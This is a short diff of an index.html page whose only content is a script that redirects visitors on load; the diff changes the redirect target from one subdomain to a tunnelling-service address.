--- a/index.html
+++ b/index.html
@@ -1,3 +1,3 @@
 <script type="text/javascript">
-   window.location.href="http://mecpy88j.beesnat.com/";　
+   window.location.href="https://125205b9.r33.cpolar.top";　
 </script>
